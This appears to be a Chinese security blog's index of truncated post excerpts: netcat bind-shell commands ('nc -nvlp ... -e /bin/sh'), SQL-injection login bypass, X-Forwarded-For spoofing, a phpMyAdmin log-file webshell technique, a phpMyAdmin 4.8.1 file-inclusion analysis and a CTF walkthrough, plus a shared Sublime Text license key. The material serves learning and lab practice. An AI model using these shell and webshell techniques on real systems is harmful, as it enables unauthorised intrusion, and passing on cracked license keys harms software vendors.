Netcat基本用法总结 NOTES

0x01基础使用 靶机创建一个服务端: nc -nvlp [端口] 攻击机开启监听: nc [服务端IP] [端口] 0x02获取shell 正向shell 靶机创建一个服务端: #Windows nc -nvlp [端口] -e cmd.exe #Linux nc -nvlp [端口] -e /bin/sh 攻击机开启监听: nc [服务端IP] [端口]...
myluzh 发布于 

Kali Liunx更新源-国内Kali源 NOTES

0x01编辑kali的更新源地址文件 sudo vim /etc/apt/sources.list 0x02添加下面的源地址(选择几个增加即可) #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu...
myluzh 发布于 

Kali Liunx下利用openssl进行md5加密 NOTES

0x01 MD5加密 交互式输入 [root@kali ~]# openssl OpenSSL> md5 123456 (stdin)= f447b20a7fcbf53a5d5be013ea0b15af OpenSSL> md5 123456(stdin)= e10adc3949ba59abbe56e057f20f883e #M...
myluzh 发布于 
article cover

Sublime Text 3 安装 注册 汉化 NOTES

0x01安装 进入官网 下载Sublime Text 3 并且安装,官网下载太慢的话可以复制下载链接用迅雷下载。 0x02注册 运行Sublime,先点击状态栏的help,再点击进入enter lisence ,跳出来一个对话框,把下面的激活码复制进去即可注册。 ----- BEGIN LICENSE ----- Member J2TeaM Single ...
myluzh 发布于 

简单分析登陆界面SQL注入 实现登录绕过 NOTES

0x01适用条件 1.这个登陆系统用如下SQL语句来进行登陆校验 select * from user where username = '$username' and password='$passowrd' 这种sql语句,一般后面的判断就是如果数据库中存在用户名为$username, 密码为$passowrd的用户,就登陆成功,否则就登陆失败。 2.系...
myluzh 发布于 
article cover

X-Forwarded-For,伪造HTTP请求端真实IP NOTES

关于HTTP X-Forwarded-For 介绍 需要伪造请求端为127.0.0.1,直接burpsuite抓包,然后增加字段X-forwarded-for: 127.0.0.1,提交即可 例如下面有一道CTF题,前面部分就是利用伪造xforwardedfor来实现访问的,如下,访问后提示没有访问对象的权限,对象受保护或服务器不可读。 第一时间就想到了,...
myluzh 发布于 

phpMyAdmin利用日志文件get webshell PHP

条件:需要使用root登陆phpmyadmin 0x01开启日志 进入phpmyadmin后,选择变量 1.找到“general log”选择“ON”开启,也可以通过sql语句开启日志 set global general_log='on' 2.找到“general log file”选项把日志后缀名.log改为.php,把路径改到站点根目录www下面,也可...
myluzh 发布于 

phpMyAdmin4.8.1 任意文件包含漏洞分析与利用 PHP

0x01影响版本 phpmyadmin 4.8.1 (需要登陆才能利用) 复现环境下载https://files.phpmyadmin.net/phpMyAdmin/4.8.1/phpMyAdmin-4.8.1-all-languages.zip 0x02漏洞分析 index.php 55-63行代码 if (! empty($_REQUEST['targe...
myluzh 发布于 

解决Windows Server 2019服务器管理器 安装.net framework 3.5失败 Windows

此方法同样适用于Windows Server 2008/2012/2016 Windows server安装.net,只能通过服务器管理器安装,但是通过服务器管理器安装会安装失败。 解决方法: 1.下载一个原版系统安装镜像,打开系统镜像进入sources选择sxs文件夹,把整个sxs文件夹复制到c盘下面。 2.通过服务器管理器“管理-添加角色功能”,选择....
myluzh 发布于 

JIS-CTF-VulnUpload-CTF01靶机渗透测试笔记 SECURE

JIS-CTF-VulnUpload靶机共有5个Flag,找到它们! 0x01初步探测 靶机导入虚拟机后,先找到靶机IP,使用netdiscover命令扫描即可。扫到靶机ip192.168.1.107 nmap扫描了下靶机端口,只有80端口跟22端口开着 0x02账号爆破 那就访问http://192.168.1.107先看看吧,跳转到了login.ph...
myluzh 发布于